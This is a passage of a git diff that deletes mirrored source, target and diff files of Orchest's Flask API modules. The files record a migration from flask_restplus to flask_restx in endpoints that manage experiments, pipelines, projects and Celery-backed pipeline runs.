{"experiments": [exp.__dict__ for exp in experiments]}, 200 - - @api.doc("start_experiment") - @api.expect(schema.experiment_spec) - @api.marshal_with(schema.experiment, code=201, description="Queued experiment") - def post(self): - """Queues a new experiment.""" - # TODO: possibly use marshal() on the post_data. 
Note that we - # have moved over to using flask_restx - # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.marshal - # to make sure the default values etc. are filled in. - post_data = request.get_json() - - # TODO: maybe we can expect a datetime (in the schema) so we - # do not have to parse it here. Again note that we are now - # using flask_restx - # https://flask-restplus.readthedocs.io/en/stable/api.html#flask_restplus.fields.DateTime - scheduled_start = post_data["scheduled_start"] - scheduled_start = datetime.fromisoformat(scheduled_start) - - experiment = { - "experiment_uuid": post_data["experiment_uuid"], - "project_uuid": post_data["project_uuid"], - "pipeline_uuid": post_data["pipeline_uuid"], - "scheduled_start": scheduled_start, - "total_number_of_pipeline_runs": len(post_data["pipeline_definitions"]), - } - db.session.add(models.Experiment(**experiment)) - db.session.commit() - - pipeline_runs = [] - pipeline_run_spec = post_data["pipeline_run_spec"] - env_uuid_docker_id_mappings = None - # this way we write the entire exp to db, but avoid - # launching any run (celery task) if we detected a problem - experiment_creation_error_messages = [] - tasks_to_launch = [] - - # TODO: This can be made more efficient, since the pipeline - # is the same for all pipeline runs. The only - # difference is the parameters. So all the jobs could - # be created in batch. - for pipeline_definition, id_ in zip( - post_data["pipeline_definitions"], post_data["pipeline_run_ids"] - ): - pipeline_run_spec["pipeline_definition"] = pipeline_definition - pipeline = construct_pipeline(**post_data["pipeline_run_spec"]) - - # specify the task_id beforehand to avoid race conditions - # between the task and its presence in the db - task_id = str(uuid.uuid4()) - - non_interactive_run = { - "experiment_uuid": post_data["experiment_uuid"], - "run_uuid": task_id, - "pipeline_run_id": id_, - "pipeline_uuid": pipeline.properties["uuid"], - "project_uuid": post_data["project_uuid"], - "status": "PENDING", - } - db.session.add(models.NonInteractivePipelineRun(**non_interactive_run)) - # need to flush because otherwise the bulk insertion of - # pipeline steps will lead to foreign key errors - # https://docs.sqlalchemy.org/en/13/orm/persistence_techniques.html#bulk-operations-caveats - db.session.flush() - - # TODO: this code is also in `namespace_runs`. Could - # potentially be put in a function for modularity. - # Set an initial value for the status of the pipeline - # steps that will be run. 
- step_uuids = [s.properties["uuid"] for s in pipeline.steps] - pipeline_steps = [] - for step_uuid in step_uuids: - pipeline_steps.append( - models.PipelineRunStep( - **{ - "run_uuid": task_id, - "step_uuid": step_uuid, - "status": "PENDING", - } - ) - ) - db.session.bulk_save_objects(pipeline_steps) - db.session.commit() - - non_interactive_run["pipeline_steps"] = pipeline_steps - pipeline_runs.append(non_interactive_run) - - # get docker ids of images to use and make it so that the - # images will not be deleted in case they become - # outdated by an environment rebuild - # compute it only once because this way we are guaranteed - # that the mappings will be the same for all runs, having - # a new environment build terminate while submitting the - # different runs won't affect the experiment - if env_uuid_docker_id_mappings is None: - try: - env_uuid_docker_id_mappings = lock_environment_images_for_run( - task_id, - post_data["project_uuid"], - pipeline.get_environments(), - ) - except errors.ImageNotFound as e: - experiment_creation_error_messages.append( - f"Pipeline was referencing environments for " - f"which an image does not exist, {e}" - ) - else: - image_mappings = [ - models.PipelineRunImageMapping( - **{ - "run_uuid": task_id, - "orchest_environment_uuid": env_uuid, - "docker_img_id": docker_id, - } - ) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - ] - db.session.bulk_save_objects(image_mappings) - db.session.commit() - - if len(experiment_creation_error_messages) == 0: - # prepare the args for the task - run_config = pipeline_run_spec["run_config"] - run_config["env_uuid_docker_id_mappings"] = env_uuid_docker_id_mappings - celery_job_kwargs = { - "experiment_uuid": post_data["experiment_uuid"], - "project_uuid": post_data["project_uuid"], - "pipeline_definition": pipeline.to_dict(), - "run_config": run_config, - } - - # Due to circular imports we use the task name instead of - # importing the function directly. - tasks_to_launch.append( - { - "name": "app.core.tasks.start_non_interactive_pipeline_run", - "eta": scheduled_start, - "kwargs": celery_job_kwargs, - "task_id": task_id, - } - ) - - experiment["pipeline_runs"] = pipeline_runs - - if len(experiment_creation_error_messages) == 0: - # Create Celery object with the Flask context - celery = make_celery(current_app) - for task in tasks_to_launch: - res = celery.send_task(**task) - # NOTE: this is only if a backend is configured. The task does - # not return anything. Therefore we can forget its result and - # make sure that the Celery backend releases recourses (for - # storing and transmitting results) associated to the task. - # Uncomment the line below if applicable. - res.forget() - - return experiment, 201 - else: - logging.error("\n".join(experiment_creation_error_messages)) - - # simple way to update both in memory objects - # and the db while avoiding multiple update statements - # (1 for each object) - for pipeline_run in experiment["pipeline_runs"]: - pipeline_run.status = "SUCCESS" - for step in pipeline_run["pipeline_steps"]: - step.status = "FAILURE" - - models.PipelineRunStep.query.filter_by( - run_uuid=pipeline_run["run_uuid"] - ).update({"status": "FAILURE"}) - - models.NonInteractivePipelineRun.query.filter_by( - experiment_uuid=post_data["experiment_uuid"] - ).update({"status": "SUCCESS"}) - db.session.commit() - - return { - "message": "Failed to create experiment because not all referenced environments are available." 
- }, 500 - - -@api.route("/") -@api.param("experiment_uuid", "UUID of experiment") -@api.response(404, "Experiment not found") -class Experiment(Resource): - @api.doc("get_experiment") - @api.marshal_with(schema.experiment, code=200) - def get(self, experiment_uuid): - """Fetches an experiment given its UUID.""" - experiment = models.Experiment.query.get_or_404( - experiment_uuid, - description="Experiment not found", - ) - return experiment.__dict__ - - # TODO: We should also make it possible to stop a particular pipeline - # run of an experiment. It should state "cancel" the execution - # of a pipeline run, since we do not do termination of running - # tasks. - @api.doc("delete_experiment") - @api.response(200, "Experiment terminated") - def delete(self, experiment_uuid): - """Stops an experiment given its UUID. - - However, it will not delete any corresponding database entries, - it will update the status of corresponding objects to "REVOKED". - """ - if stop_experiment(experiment_uuid): - return {"message": "Experiment termination was successful"}, 200 - else: - return ( - { - "message": "Experiment does not \ - exist or is already completed" - }, - 404, - ) - - -@api.route( - "//", - doc={ - "description": ( - "Set and get execution status of pipeline runs " "in an experiment." - ) - }, -) -@api.param("experiment_uuid", "UUID of Experiment") -@api.param("run_uuid", "UUID of Run") -@api.response(404, "Pipeline run not found") -class PipelineRun(Resource): - @api.doc("get_pipeline_run") - @api.marshal_with(schema.non_interactive_run, code=200) - def get(self, experiment_uuid, run_uuid): - """Fetch a pipeline run of an experiment given their ids.""" - non_interactive_run = models.NonInteractivePipelineRun.query.filter_by( - run_uuid=run_uuid, - ).one_or_none() - if non_interactive_run is None: - abort(404, "Given experiment has no run with given run_uuid") - return non_interactive_run.__dict__ - - @api.doc("set_pipeline_run_status") - @api.expect(schema.status_update) - def put(self, experiment_uuid, run_uuid): - """Set the status of a pipeline run.""" - status_update = request.get_json() - - # The pipeline run has reached a final state, thus we can update - # the experiment "completed_pipeline_runs" attribute. - if status_update["status"] in ["SUCCESS", "FAILURE"]: - experiment = models.Experiment.query.get_or_404( - experiment_uuid, - description="Experiment not found", - ) - experiment.completed_pipeline_runs += 1 - db.session.commit() - - filter_by = { - "experiment_uuid": experiment_uuid, - "run_uuid": run_uuid, - } - update_status_db( - status_update, model=models.NonInteractivePipelineRun, filter_by=filter_by - ) - - return {"message": "Status was updated successfully"}, 200 - - -@api.route( - "///", - doc={ - "description": ( - "Set and get execution status of individual steps of " - "pipeline runs in an experiment." 
- ) - }, -) -@api.param("experiment_uuid", "UUID of Experiment") -@api.param("run_uuid", "UUID of Run") -@api.param("step_uuid", "UUID of Step") -@api.response(404, "Pipeline step not found") -class PipelineStepStatus(Resource): - @api.doc("get_pipeline_run_pipeline_step") - @api.marshal_with(schema.non_interactive_run, code=200) - def get(self, experiment_uuid, run_uuid, step_uuid): - """Fetch a pipeline step of a run of an experiment given uuids.""" - step = models.PipelineRunStep.query.get_or_404( - ident=(run_uuid, step_uuid), - description="Combination of given experiment, run and step not found", - ) - return step.__dict__ - - @api.doc("set_pipeline_run_pipeline_step_status") - @api.expect(schema.status_update) - def put(self, experiment_uuid, run_uuid, step_uuid): - """Set the status of a pipeline step of a pipeline run.""" - status_update = request.get_json() - - filter_by = { - "run_uuid": run_uuid, - "step_uuid": step_uuid, - } - update_status_db( - status_update, - model=models.PipelineRunStep, - filter_by=filter_by, - ) - - return {"message": "Status was updated successfully"}, 200 - - -@api.route("/cleanup/") -@api.param("experiment_uuid", "UUID of experiment") -@api.response(404, "Experiment not found") -class ExperimentDeletion(Resource): - @api.doc("delete_experiment") - @api.response(200, "Experiment deleted") - def delete(self, experiment_uuid): - """Delete an experiment. - - The experiment is stopped if its running, related entities - are then removed from the db. - """ - if delete_experiment(experiment_uuid): - return {"message": "Experiment deletion was successful"}, 200 - else: - return {"message": "Experiment does not exist"}, 404 - - -def stop_experiment(experiment_uuid) -> bool: - """Stop an experiment. - - Args: - experiment_uuid: - - Returns: - True if the experiment exists and was stopped, false - if it did not exist or if it was already completed. - """ - experiment = models.Experiment.query.filter_by( - experiment_uuid=experiment_uuid - ).one_or_none() - if experiment is None: - return False - - run_uuids = [ - run.run_uuid - for run in experiment.pipeline_runs - if run.status in ["PENDING", "STARTED"] - ] - if len(run_uuids) == 0: - return False - - # Aborts and revokes all pipeline runs and waits for a - # reply for 1.0s. - celery = make_celery(current_app) - celery.control.revoke(run_uuids, timeout=1.0) - - # TODO: possibly set status of steps and Run to "ABORTED" - # note that a race condition would be present since the task - # will try to set the status as well - for run_uuid in run_uuids: - res = AbortableAsyncResult(run_uuid, app=celery) - # it is responsibility of the task to terminate by reading \ - # it's aborted status - res.abort() - - # Update the status of the run and step entries to "REVOKED". - models.NonInteractivePipelineRun.query.filter_by(run_uuid=run_uuid).update( - {"status": "REVOKED"} - ) - - models.PipelineRunStep.query.filter_by(run_uuid=run_uuid).update( - {"status": "REVOKED"} - ) - - db.session.commit() - return True - - -def delete_experiment(experiment_uuid) -> bool: - """Delete an experiment. - - If running, the experiment is aborted. All data related - to the experiment is removed. - - Args: - experiment_uuid: - - Returns: - True if the experiment existed and was removed, false - otherwise. 
- """ - experiment = models.Experiment.query.filter_by( - experiment_uuid=experiment_uuid - ).one_or_none() - if experiment is None: - return False - - stop_experiment(experiment_uuid) - # non interactive runs -> non interactive run image mapping - # non interactive runs step - db.session.delete(experiment) - db.session.commit() - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.diff deleted file mode 100644 index e3f1d35..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.diff +++ /dev/null @@ -1,16 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_pipelines.py b/services/orchest-api/app/app/apis/namespace_pipelines.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_pipelines.py - +++ b/services/orchest-api/app/app/apis/namespace_pipelines.py -@@ -1,9 +1,9 @@ - """API endpoint to manage pipelines. - --Despite the fact that the orchest api has no model related to a -+Despite the fact that the orchest api has no model related to a - pipeline, a good amount of other models depend on such a concept. - """ --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from app.apis.namespace_runs import stop_pipeline_run diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.source.py deleted file mode 100644 index d26acba..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.source.py +++ /dev/null @@ -1,62 +0,0 @@ -"""API endpoint to manage pipelines. - -Despite the fact that the orchest api has no model related to a -pipeline, a good amount of other models depend on such a concept. -""" -from flask_restplus import Namespace, Resource - -import app.models as models -from app.apis.namespace_runs import stop_pipeline_run -from app.apis.namespace_sessions import stop_interactive_session -from app.connections import db -from app.utils import register_schema - -api = Namespace("pipelines", description="Managing pipelines") -api = register_schema(api) - - -@api.route("//") -@api.param("project_uuid", "UUID of the project") -@api.param("pipeline_uuid", "UUID of the pipeline") -class Pipeline(Resource): - @api.doc("delete_pipeline") - @api.response(200, "Pipeline cleaned up") - def delete(self, project_uuid, pipeline_uuid): - """Delete a pipeline. - - Any session, run, experiment related to the pipeline is stopped - and removed from the db. - """ - delete_pipeline(project_uuid, pipeline_uuid) - return {"message": "Pipeline deletion was successful"}, 200 - - -def delete_pipeline(project_uuid, pipeline_uuid): - """Delete a pipeline and all related entities. - - - Any session or run related to the pipeline is stopped - and removed from the db. 
- - Args: - project_uuid: - pipeline_uuid: - """ - # any interactive run related to the pipeline is stopped - # if necessary, then deleted - interactive_runs = models.InteractivePipelineRun.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).all() - for run in interactive_runs: - if run.status in ["PENDING", "STARTED"]: - stop_pipeline_run(run.run_uuid) - - # will delete cascade - # interactive run pipeline step - # interactive run image mapping - db.session.delete(run) - - # stop and delete any session if it exists - stop_interactive_session(project_uuid, pipeline_uuid) - - db.session.commit() diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.target.py deleted file mode 100644 index 85eccf5..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.target.py +++ /dev/null @@ -1,62 +0,0 @@ -"""API endpoint to manage pipelines. - -Despite the fact that the orchest api has no model related to a -pipeline, a good amount of other models depend on such a concept. -""" -from flask_restx import Namespace, Resource - -import app.models as models -from app.apis.namespace_runs import stop_pipeline_run -from app.apis.namespace_sessions import stop_interactive_session -from app.connections import db -from app.utils import register_schema - -api = Namespace("pipelines", description="Managing pipelines") -api = register_schema(api) - - -@api.route("//") -@api.param("project_uuid", "UUID of the project") -@api.param("pipeline_uuid", "UUID of the pipeline") -class Pipeline(Resource): - @api.doc("delete_pipeline") - @api.response(200, "Pipeline cleaned up") - def delete(self, project_uuid, pipeline_uuid): - """Delete a pipeline. - - Any session, run, experiment related to the pipeline is stopped - and removed from the db. - """ - delete_pipeline(project_uuid, pipeline_uuid) - return {"message": "Pipeline deletion was successful"}, 200 - - -def delete_pipeline(project_uuid, pipeline_uuid): - """Delete a pipeline and all related entities. - - - Any session or run related to the pipeline is stopped - and removed from the db. 
- - Args: - project_uuid: - pipeline_uuid: - """ - # any interactive run related to the pipeline is stopped - # if necessary, then deleted - interactive_runs = models.InteractivePipelineRun.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).all() - for run in interactive_runs: - if run.status in ["PENDING", "STARTED"]: - stop_pipeline_run(run.run_uuid) - - # will delete cascade - # interactive run pipeline step - # interactive run image mapping - db.session.delete(run) - - # stop and delete any session if it exists - stop_interactive_session(project_uuid, pipeline_uuid) - - db.session.commit() diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.diff deleted file mode 100644 index 07de8a0..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.diff +++ /dev/null @@ -1,16 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_projects.py b/services/orchest-api/app/app/apis/namespace_projects.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_projects.py - +++ b/services/orchest-api/app/app/apis/namespace_projects.py -@@ -1,9 +1,9 @@ - """API endpoint to manage projects. - --Despite the fact that the orchest api has no model related to a -+Despite the fact that the orchest api has no model related to a - project, a good amount of other models depend on such a concept. - """ --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from app.apis.namespace_environment_images import delete_project_environment_images diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.source.py deleted file mode 100644 index 023f975..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.source.py +++ /dev/null @@ -1,89 +0,0 @@ -"""API endpoint to manage projects. - -Despite the fact that the orchest api has no model related to a -project, a good amount of other models depend on such a concept. -""" -from flask_restplus import Namespace, Resource - -import app.models as models -from app.apis.namespace_environment_images import delete_project_environment_images -from app.apis.namespace_experiments import delete_experiment -from app.apis.namespace_runs import stop_pipeline_run -from app.apis.namespace_sessions import stop_interactive_session -from app.connections import db -from app.utils import register_schema - -api = Namespace("projects", description="Managing Projects") -api = register_schema(api) - - -@api.route("/") -@api.param("project_uuid", "UUID of the project") -class Project(Resource): - @api.doc("delete_project") - @api.response(200, "Project deleted") - def delete(self, project_uuid): - """Delete a project. - - Any session, run, experiment related to the project is stopped - and removed from the db. Environment images are removed. - """ - delete_project(project_uuid) - return {"message": "Project deletion was successful"}, 200 - - -def delete_project(project_uuid): - """Delete a project and all related entities. 
- - Project sessions, runs and experiments are stopped. Every - related entity in the db is removed. Environment images are - deleted. - - Args: - project_uuid: - """ - - # any interactive run related to the pipeline is stopped - # if necessary, then deleted - interactive_runs = models.InteractivePipelineRun.query.filter_by( - project_uuid=project_uuid - ).all() - for run in interactive_runs: - if run.status in ["PENDING", "STARTED"]: - stop_pipeline_run(run.run_uuid) - # will delete cascade - # interactive run pipeline step - # interactive run image mapping - db.session.delete(run) - - # stop and delete any running session - sessions = ( - models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, - ) - .with_entities( - models.InteractiveSession.project_uuid, - models.InteractiveSession.pipeline_uuid, - ) - .distinct() - .all() - ) - for session in sessions: - # stop and delete any session if it exists - stop_interactive_session(session.project_uuid, session.pipeline_uuid) - - # any experiment related to the pipeline is stopped if necessary, - # then deleted - experiments = ( - models.Experiment.query.filter_by( - project_uuid=project_uuid, - ) - .with_entities(models.Experiment.experiment_uuid) - .all() - ) - for experiment in experiments: - delete_experiment(experiment.experiment_uuid) - - # delete images (will also take care of builds and dangling images) - delete_project_environment_images(project_uuid) - db.session.commit() diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.target.py deleted file mode 100644 index 80a0927..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.target.py +++ /dev/null @@ -1,89 +0,0 @@ -"""API endpoint to manage projects. - -Despite the fact that the orchest api has no model related to a -project, a good amount of other models depend on such a concept. -""" -from flask_restx import Namespace, Resource - -import app.models as models -from app.apis.namespace_environment_images import delete_project_environment_images -from app.apis.namespace_experiments import delete_experiment -from app.apis.namespace_runs import stop_pipeline_run -from app.apis.namespace_sessions import stop_interactive_session -from app.connections import db -from app.utils import register_schema - -api = Namespace("projects", description="Managing Projects") -api = register_schema(api) - - -@api.route("/") -@api.param("project_uuid", "UUID of the project") -class Project(Resource): - @api.doc("delete_project") - @api.response(200, "Project deleted") - def delete(self, project_uuid): - """Delete a project. - - Any session, run, experiment related to the project is stopped - and removed from the db. Environment images are removed. - """ - delete_project(project_uuid) - return {"message": "Project deletion was successful"}, 200 - - -def delete_project(project_uuid): - """Delete a project and all related entities. - - Project sessions, runs and experiments are stopped. Every - related entity in the db is removed. Environment images are - deleted.
- - Args: - project_uuid: - """ - - # any interactive run related to the pipeline is stopped - # if necessary, then deleted - interactive_runs = models.InteractivePipelineRun.query.filter_by( - project_uuid=project_uuid - ).all() - for run in interactive_runs: - if run.status in ["PENDING", "STARTED"]: - stop_pipeline_run(run.run_uuid) - # will delete cascade - # interactive run pipeline step - # interactive run image mapping - db.session.delete(run) - - # stop and delete any running session - sessions = ( - models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, - ) - .with_entities( - models.InteractiveSession.project_uuid, - models.InteractiveSession.pipeline_uuid, - ) - .distinct() - .all() - ) - for session in sessions: - # stop and delete any session if it exists - stop_interactive_session(session.project_uuid, session.pipeline_uuid) - - # any experiment related to the pipeline is stopped if necessary, - # then deleted - experiments = ( - models.Experiment.query.filter_by( - project_uuid=project_uuid, - ) - .with_entities(models.Experiment.experiment_uuid) - .all() - ) - for experiment in experiments: - delete_experiment(experiment.experiment_uuid) - - # delete images (will also take care of builds and dangling images) - delete_project_environment_images(project_uuid) - db.session.commit() diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.diff deleted file mode 100644 index 5fb576e..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_runs.py b/services/orchest-api/app/app/apis/namespace_runs.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_runs.py - +++ b/services/orchest-api/app/app/apis/namespace_runs.py -@@ -8,7 +8,7 @@ import uuid - from celery.contrib.abortable import AbortableAsyncResult - from docker import errors - from flask import abort, current_app, request --from flask_restplus import Namespace, Resource, marshal -+from flask_restx import Namespace, Resource, marshal - - import app.models as models - from app import schema diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.source.py deleted file mode 100644 index 30ac2a0..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.source.py +++ /dev/null @@ -1,259 +0,0 @@ -"""API endpoint to manage runs. - -Note: "run" is short for "interactive pipeline run". 
-""" -import logging -import uuid - -from celery.contrib.abortable import AbortableAsyncResult -from docker import errors -from flask import abort, current_app, request -from flask_restplus import Namespace, Resource, marshal - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.core.pipelines import construct_pipeline -from app.utils import lock_environment_images_for_run, register_schema, update_status_db - -api = Namespace("runs", description="Manages interactive pipeline runs") -api = register_schema(api) - - -@api.route("/") -class RunList(Resource): - @api.doc("get_runs") - @api.marshal_with(schema.interactive_runs) - def get(self): - """Fetches all (interactive) pipeline runs. - - These pipeline runs are either pending, running or have already - completed. - """ - - query = models.InteractivePipelineRun.query - - # Ability to query a specific runs given the `pipeline_uuid` or `project_uuid` - # through the URL (using `request.args`). - if "pipeline_uuid" in request.args and "project_uuid" in request.args: - query = query.filter_by( - pipeline_uuid=request.args.get("pipeline_uuid") - ).filter_by(project_uuid=request.args.get("project_uuid")) - elif "project_uuid" in request.args: - query = query.filter_by(project_uuid=request.args.get("project_uuid")) - - runs = query.all() - return {"runs": [run.__dict__ for run in runs]}, 200 - - @api.doc("start_run") - @api.expect(schema.interactive_run_spec) - def post(self): - """Starts a new (interactive) pipeline run.""" - post_data = request.get_json() - post_data["run_config"]["run_endpoint"] = "runs" - - pipeline = construct_pipeline(**post_data) - - # specify the task_id beforehand to avoid race conditions - # between the task and its presence in the db - task_id = str(uuid.uuid4()) - - # NOTE: we are setting the status of the run ourselves without - # using the option of celery to get the status of tasks. This - # way we do not have to configure a backend (where the default - # of "rpc://" does not give the results we would want). - run = { - "run_uuid": task_id, - "pipeline_uuid": pipeline.properties["uuid"], - "project_uuid": post_data["project_uuid"], - "status": "PENDING", - } - db.session.add(models.InteractivePipelineRun(**run)) - # need to flush because otherwise the bulk insertion of pipeline - # steps will lead to foreign key errors - # https://docs.sqlalchemy.org/en/13/orm/persistence_techniques.html#bulk-operations-caveats - db.session.flush() - - # Set an initial value for the status of the pipeline steps that - # will be run. 
- step_uuids = [s.properties["uuid"] for s in pipeline.steps] - - pipeline_steps = [] - for step_uuid in step_uuids: - pipeline_steps.append( - models.PipelineRunStep( - **{"run_uuid": task_id, "step_uuid": step_uuid, "status": "PENDING"} - ) - ) - db.session.bulk_save_objects(pipeline_steps) - db.session.commit() - run["pipeline_steps"] = pipeline_steps - - # get docker ids of images to use and make it so that the images - # will not be deleted in case they become outdated by an - # environment rebuild - try: - env_uuid_docker_id_mappings = lock_environment_images_for_run( - task_id, - post_data["project_uuid"], - pipeline.get_environments(), - ) - except errors.ImageNotFound as e: - logging.error( - f"Pipeline was referencing environments for " - f"which an image does not exist, {e}" - ) - - # simple way to update both in memory objects - # and the db while avoiding multiple update statements - # (1 for each object) - # TODO: make it so that the client does not rely - # on SUCCESS as a status - run["status"] = "SUCCESS" - for step in run["pipeline_steps"]: - step.status = "FAILURE" - models.InteractivePipelineRun.query.filter_by(run_uuid=task_id).update( - {"status": "SUCCESS"} - ) - models.PipelineRunStep.query.filter_by(run_uuid=task_id).update( - {"status": "FAILURE"} - ) - db.session.commit() - - return { - "message": "Failed to start interactive run because not all referenced environments are available." - }, 500 - - # Create Celery object with the Flask context and construct the - # kwargs for the job. - celery = make_celery(current_app) - run_config = post_data["run_config"] - run_config["env_uuid_docker_id_mappings"] = env_uuid_docker_id_mappings - celery_job_kwargs = { - "pipeline_definition": pipeline.to_dict(), - "project_uuid": post_data["project_uuid"], - "run_config": run_config, - } - - # Start the run as a background task on Celery. Due to circular - # imports we send the task by name instead of importing the - # function directly. - res = celery.send_task( - "app.core.tasks.run_pipeline", kwargs=celery_job_kwargs, task_id=task_id - ) - - # NOTE: this is only if a backend is configured. The task does - # not return anything. Therefore we can forget its result and - # make sure that the Celery backend releases recourses (for - # storing and transmitting results) associated to the task. - # Uncomment the line below if applicable. 
- res.forget() - return marshal(run, schema.interactive_run), 201 - - -@api.route("/") -@api.param("run_uuid", "UUID of Run") -@api.response(404, "Run not found") -class Run(Resource): - @api.doc("get_run") - @api.marshal_with(schema.interactive_run, code=200) - def get(self, run_uuid): - """Fetches an interactive pipeline run given its UUID.""" - run = models.InteractivePipelineRun.query.filter_by( - run_uuid=run_uuid - ).one_or_none() - if run is None: - abort(404, description="Run not found") - return run.__dict__ - - @api.doc("set_run_status") - @api.expect(schema.status_update) - def put(self, run_uuid): - """Sets the status of a pipeline run.""" - post_data = request.get_json() - - res = models.InteractivePipelineRun.query.filter_by(run_uuid=run_uuid).update( - {"status": post_data["status"]} - ) - - if res: - db.session.commit() - - return {"message": "Status was updated successfully"}, 200 - - @api.doc("delete_run") - @api.response(200, "Run terminated") - def delete(self, run_uuid): - """Stops a pipeline run given its UUID.""" - if stop_pipeline_run(run_uuid): - return {"message": "Run termination was successful"}, 200 - else: - return {"message": "Run does not exist or is not running"}, 400 - - -@api.route("//") -@api.param("run_uuid", "UUID of Run") -@api.param("step_uuid", "UUID of Pipeline Step") -@api.response(404, "Pipeline step not found") -class StepStatus(Resource): - @api.doc("get_step_status") - @api.marshal_with(schema.pipeline_run_pipeline_step, code=200) - def get(self, run_uuid, step_uuid): - """Fetches the status of a pipeline step of a specific run.""" - step = models.PipelineRunStep.query.get_or_404( - ident=(run_uuid, step_uuid), - description="Run and step combination not found", - ) - return step.__dict__ - - @api.doc("set_step_status") - @api.expect(schema.status_update) - def put(self, run_uuid, step_uuid): - """Sets the status of a pipeline step.""" - status_update = request.get_json() - - # TODO: first check the status and make sure it says PENDING or - # whatever. Because if is empty then this would write it - # and then get overwritten afterwards with "PENDING". - filter_by = {"run_uuid": run_uuid, "step_uuid": step_uuid} - update_status_db( - status_update, model=models.PipelineRunStep, filter_by=filter_by - ) - - return {"message": "Status was updated successfully"}, 200 - - -def stop_pipeline_run(run_uuid) -> bool: - """Stop a pipeline run. - - The run will cancelled if not running yet, otherwise - it will be aborted. - - Args: - run_uuid: - - Returns: - True if a cancellation was issued to the run, false if the - run did not exist or was not PENDING/STARTED. 
- """ - interactive_run = models.PipelineRun.query.filter( - models.PipelineRun.status.in_(["PENDING", "STARTED"]), - models.PipelineRun.run_uuid == run_uuid, - ).one_or_none() - if interactive_run is None: - return False - - celery_app = make_celery(current_app) - res = AbortableAsyncResult(run_uuid, app=celery_app) - - # it is responsibility of the task to terminate by reading - # it's aborted status - res.abort() - - celery_app.control.revoke(run_uuid) - # TODO: possibly set status of steps and Run to "ABORTED" - # note that a race condition would be present since the - # task will try to set the status as well - - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.target.py deleted file mode 100644 index b08770d..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.target.py +++ /dev/null @@ -1,259 +0,0 @@ -"""API endpoint to manage runs. - -Note: "run" is short for "interactive pipeline run". -""" -import logging -import uuid - -from celery.contrib.abortable import AbortableAsyncResult -from docker import errors -from flask import abort, current_app, request -from flask_restx import Namespace, Resource, marshal - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.core.pipelines import construct_pipeline -from app.utils import lock_environment_images_for_run, register_schema, update_status_db - -api = Namespace("runs", description="Manages interactive pipeline runs") -api = register_schema(api) - - -@api.route("/") -class RunList(Resource): - @api.doc("get_runs") - @api.marshal_with(schema.interactive_runs) - def get(self): - """Fetches all (interactive) pipeline runs. - - These pipeline runs are either pending, running or have already - completed. - """ - - query = 